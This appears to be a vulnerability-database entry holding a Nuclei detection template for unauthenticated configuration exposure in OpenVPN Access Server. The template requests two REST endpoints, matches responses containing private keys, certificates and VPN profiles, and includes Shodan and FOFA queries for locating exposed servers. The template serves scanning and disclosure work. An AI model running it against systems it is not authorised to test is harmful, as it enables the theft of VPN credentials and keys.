openvpn-as-config-exposure: OpenVPN Access Server - Configuration Exposure

Date: 2026-01-27 | Affected software: OpenVPN Access Server | PoC: public

Vulnerability description

Detects an OpenVPN Access Server instance that exposes sensitive configuration data, including VPN client profiles, certificates, private keys and session tokens, without requiring authentication.

PoC code [public]

id: openvpn-as-config-exposure

info:
  name: OpenVPN Access Server - Configuration Exposure
  author: 0x_Akoko
  severity: high
  description: |
    Detected OpenVPN Access Server with sensitive configuration data exposed, including VPN client profiles, certificates, private keys, and session tokens, without authentication.
  reference:
    - https://openvpn.net/vpn-server-resources/access-server-rest-api/
  metadata:
    max-request: 2
    verified: true
    shodan-query: http.title:"OpenVPN Access Server"
    fofa-query: title="OpenVPN Access Server"
  tags: openvpn,config,exposure,misconfig,vpn

http:
  - method: GET
    path:
      - "{{BaseURL}}/rest/GetUserlogin"
      - "{{BaseURL}}/rest/GetAutologin"

    stop-at-first-match: true

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "application/x-openvpn-profile")'
          - 'contains_all(body, "-----BEGIN PRIVATE KEY-----", "-----BEGIN CERTIFICATE-----", "OVPN_ACCESS_SERVER")'
        condition: and
# digest: 490a00463044022030d5c966d7cdd2c30e402069495c704874ad5ed5143b5ce5cb9d1c3d014d32750220257fff773a2c872d4fe4865fb4ece5b7359e23fb69e7248450c6959d88eca50d:922c64590222798bb761d5b6d8e72950